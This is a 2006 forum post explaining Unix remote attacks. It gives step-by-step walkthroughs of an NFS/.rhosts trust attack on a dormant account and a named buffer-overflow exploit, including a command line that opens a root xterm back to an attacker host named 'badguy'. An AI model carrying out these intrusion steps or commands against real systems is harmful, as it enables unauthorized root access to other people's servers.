Dr4k3 Posted November 14, 2006 Report Share Posted November 14, 2006 Unix Remote AttacksWhat are remote hacks?A remote hack is when you attack a server you are not logged into. Usually this is done from another server, although in some cases you can do it from a regular PC (depending on the operating system).Guessing a user account and password (unless it is a guest account) on a remote system is barely considered a remote hack, so we're not really cover that. We'll assume you don't know an account name and password on the remote system.Remote hacks come in a couple of different flavors. Usually exploiting an existing service running on the victim server (which is misconfigured or allows too much access) is the goal. Exporting a NFS mount read/write to anyone might not be a bad thing, but if you can NFS mount directories containing .rhosts files, then it can be a very bad thing. Also, certain daemons running might be subject to buffer overflows remotely, allowing someone from a remote location run arbitrary commands on the victim server.Here are a couple of examples: 1. You are root on a host named badguy. 2. You discover the host victim is exporting /home2/old read/writable to the world. 3. You also discover by fingering various accounts that user fred's home directory is /home2/old/fred and he hasn't logged in for months. 4. Quickly, you create a fred account on badguy. 5. Now you mount /home2/old and create an .rhosts file to establish trust with badguy. 6. After you become fred on badguy, you rlogin to the victim as fred.Here's another attack involving a buffer overflow: 1. This remote system is running named. 2. You have written a named exploit that allows you to send arbitrary commands through the named daemon. It does a buffer overflow trick, you compile it and name it sploit. 3. You type: sploit ns.example.com "/usr/X11R6/bin/xterm -display badguy.whatever:0" 4. A window appears on your terminal that is running as root on ns.example.com. Quote Link to comment Share on other sites More sharing options...